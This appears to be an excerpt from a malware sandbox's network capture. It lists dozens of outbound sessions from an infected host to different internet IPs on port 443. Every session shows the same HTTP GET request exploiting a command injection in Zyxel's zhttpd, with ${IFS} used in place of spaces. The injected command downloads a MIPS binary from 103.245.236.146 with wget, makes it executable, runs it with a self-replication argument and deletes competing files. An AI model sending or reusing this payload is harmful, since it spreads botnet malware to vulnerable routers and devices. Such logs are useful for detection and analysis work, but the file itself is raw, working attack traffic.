                                                        Jan 28, 2024 10:12:57.502296925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5728192.168.2.14385664.228.118.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502357006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5729192.168.2.1432978158.223.218.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502403975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5730192.168.2.1460598179.186.108.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502446890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5731192.168.2.1453398197.107.106.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502494097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5732192.168.2.1460802223.10.19.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502516031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5733192.168.2.144500073.184.202.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502556086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5734192.168.2.145816231.118.25.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.502609968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5735192.168.2.1452270160.170.242.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510533094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5736192.168.2.145601859.231.41.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510559082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5737192.168.2.1442278160.44.52.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510580063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5738192.168.2.1460912147.23.68.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510613918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5739192.168.2.1438934187.121.56.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510647058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5740192.168.2.1440074109.69.45.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510720968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5741192.168.2.145662052.116.63.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510775089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5742192.168.2.1447638196.237.70.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510808945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5743192.168.2.1455110113.19.232.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510862112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5744192.168.2.143485270.230.209.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510899067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5745192.168.2.1457588123.52.247.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510931969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5746192.168.2.144997880.136.186.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.510984898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5747192.168.2.14552445.45.44.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511028051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5748192.168.2.1460442198.15.189.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511101961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5749192.168.2.1439536164.65.128.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511141062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5750192.168.2.1443242155.22.50.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511168003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5751192.168.2.144955818.56.220.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511204958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5752192.168.2.1442598182.75.229.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511245966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5753192.168.2.145573227.54.35.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511266947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5754192.168.2.143548688.119.225.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511323929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5755192.168.2.1455274191.180.98.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511341095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5756192.168.2.1440236200.163.214.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511395931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5757192.168.2.1437606197.236.216.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511420012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5758192.168.2.1453588137.173.2.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511483908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5759192.168.2.1456014165.208.48.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511507988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5760192.168.2.1457444129.20.140.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511543989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5761192.168.2.145242084.186.38.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511579990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5762192.168.2.144433052.220.122.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511651039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5763192.168.2.14498485.127.236.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511681080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5764192.168.2.1459386199.19.158.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511707067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5765192.168.2.1444988178.66.174.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511737108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5766192.168.2.143982469.128.251.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511784077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5767192.168.2.1455460171.90.15.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511804104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5768192.168.2.144812034.97.172.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511862993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5769192.168.2.144425684.116.228.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511878967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5770192.168.2.143989039.222.47.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511907101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5771192.168.2.143635262.179.107.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511945963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5772192.168.2.144134851.163.76.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.511996984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5773192.168.2.1458878100.171.150.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512022972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5774192.168.2.1449210189.97.98.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512072086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5775192.168.2.1441506196.171.218.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512123108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5776192.168.2.1450978212.68.70.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512173891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5777192.168.2.1433504165.38.182.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512211084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5778192.168.2.1459356152.100.39.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512264013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5779192.168.2.1456910163.12.226.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512290001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5780192.168.2.144618827.235.81.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512348890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5781192.168.2.1451100133.78.157.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512392998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5782192.168.2.145270258.126.104.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512433052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5783192.168.2.14398128.178.9.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512466908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5784192.168.2.1442148135.178.158.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512521982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5785192.168.2.1460304161.22.2.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512554884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5786192.168.2.1433120167.239.218.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512615919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5787192.168.2.143979896.64.38.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512620926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5788192.168.2.1456090137.64.107.178443
                                                        TimestampBytes transferredDirectionData
